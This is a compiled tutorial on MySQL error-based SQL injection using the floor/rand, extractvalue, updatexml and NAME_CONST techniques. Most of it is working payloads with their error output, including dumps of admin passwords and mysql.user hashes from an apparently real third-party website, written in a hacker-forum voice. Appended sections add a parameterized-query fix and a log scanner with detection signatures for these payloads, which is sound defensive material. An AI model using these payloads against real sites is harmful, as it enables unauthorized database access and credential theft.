1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the error message. To retrieve other data, replace the version() call with a different subquery.

For example, to read the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
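All three techniques above rely on the same two application defects: the id value is spliced into the SQL text, and the database's own error message is returned to the client. The following is an added example, not code from the original post, showing a minimal article lookup written both ways. It uses Python's sqlite3 in memory as a stand-in for MySQL (an assumption; the page's target is MySQL), so the MySQL-only functions are not reproduced, but the page's updatexml payload is used verbatim as the input. The schema and the admin row are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed sample schema mirroring the page's article/admin tables.
    sqlite3 in memory stands in for MySQL (an assumption of this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    conn.execute("create table admin (id integer primary key, user text, pass text)")
    conn.execute("insert into admin values (1, 'admin', 'admin888')")
    conn.commit()
    return conn


# One of the page's own payloads, exactly as it would arrive in the id parameter.
UPDATEXML_PAYLOAD = "1 and 1=(updatexml(1,concat(0x3a,(select user())),1))"


class VulnerableApp:
    """'Before' state: the raw id is spliced into the SQL text, and whatever the
    database says about the failure is handed straight back to the client.
    Both properties are needed for the error-based techniques on this page."""

    def __init__(self, conn):
        self.conn = conn

    def lookup(self, raw_id):
        sql = "select id, title, content from article where id = " + raw_id
        try:
            return {"rows": self.conn.execute(sql).fetchall()}
        except sqlite3.Error as exc:
            return {"error": str(exc)}  # database error text reaches the client


class HardenedApp:
    """'After' state: the id is validated as an integer and bound as a query
    parameter, so it can never be parsed as SQL; database errors are written to
    a server-side log and the client only ever sees a fixed generic message."""

    def __init__(self, conn):
        self.conn = conn
        self.server_log = []

    def lookup(self, raw_id):
        try:
            article_id = int(raw_id)
        except (TypeError, ValueError):
            return {"error": "invalid id"}  # rejected before touching the database
        try:
            rows = self.conn.execute(
                "select id, title, content from article where id = ?",
                (article_id,),
            ).fetchall()
            return {"rows": rows}
        except sqlite3.Error as exc:
            self.server_log.append(repr(exc))  # detail stays on the server
            return {"error": "internal error"}


def demo():
    """Run both handlers against a normal id and the page's updatexml payload."""
    conn = make_db()
    vuln, hard = VulnerableApp(conn), HardenedApp(conn)
    return {
        "vuln_normal": vuln.lookup("1"),
        "vuln_payload": vuln.lookup(UPDATEXML_PAYLOAD),
        "hard_normal": hard.lookup("1"),
        "hard_payload": hard.lookup(UPDATEXML_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Run it directly and it prints the four results. The contrast on the payload is the point: the vulnerable handler returns the database's own wording (here sqlite3's "no such function" text, on MySQL the Duplicate entry or XPATH syntax error lines shown above), which is exactly the channel the extracted data travels through, while the hardened handler rejects the value before it reaches the database and, if the database does fail, answers with a fixed string and keeps the detail in the server-side log.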
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error uplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error uplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything older than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error uplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error uplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error uplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error uplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
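The payloads in this tutorial travel in the query string, so they leave recognisable traces in ordinary web server access logs: the function names (NAME_CONST, extractvalue, updatexml, floor(rand(0)*2)) and the information_schema and mysql.user references all survive URL encoding. The following is an added example, not part of the original post: a small scanner that parses combined-format access log lines, URL-decodes each query parameter and flags the error-based signatures seen on this page. The log lines are constructed samples (RFC 5737 documentation addresses), and the signature set and log format are assumptions of the example, not a standard rule set.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx combined log format (an assumption of this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Signatures of the error-based techniques discussed on this page, matched
# against each decoded parameter value. Whitespace is optional around the
# parentheses because the page shows forms such as "select*from".
SIGNATURES = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I),
    "mysql_user_table": re.compile(r"\bmysql\s*\.\s*user\b", re.I),
}

# Constructed sample log lines: one clean request, three carrying payloads
# of the kinds shown on this page, and one benign false-positive candidate.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--&sid=19 HTTP/1.1" 500 412',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 388',
    '198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 388',
    '192.0.2.9 - - [10/Oct/2023:13:57:12 +0000] "GET /search.php?q=rand+walk+floor+plans HTTP/1.1" 200 2210',
]


def detect(line):
    """Return a finding dict for one log line, or None if nothing matched.
    parse_qsl splits each pair at the first '=' and decodes '+' and %XX,
    so the '+'-separated payload style used in the tutorial is handled."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    params = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            params.append((name, matched))
    if not params:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")), "params": params}


def scan(lines):
    """Run detect() over a sequence of log lines and keep the findings."""
    return [f for f in (detect(line) for line in lines) if f]


def suspicious_sources(findings):
    """Count findings per client address, the usual pivot for triage."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan(LOG_LINES)
    for f in results:
        print(f)
    print(suspicious_sources(results))
```

Run as a script it prints the three findings and the per-address counts. Two details matter in practice: matching happens on the decoded parameter value rather than the raw request line, so percent-encoded and plus-encoded payloads are treated alike, and the benign "rand walk floor plans" query is not flagged because the floor signature requires the rand( call inside floor(. Correlating these hits with the 500 responses that an unhandled Duplicate entry or XPATH syntax error produces is a cheap way to separate probing from successful extraction.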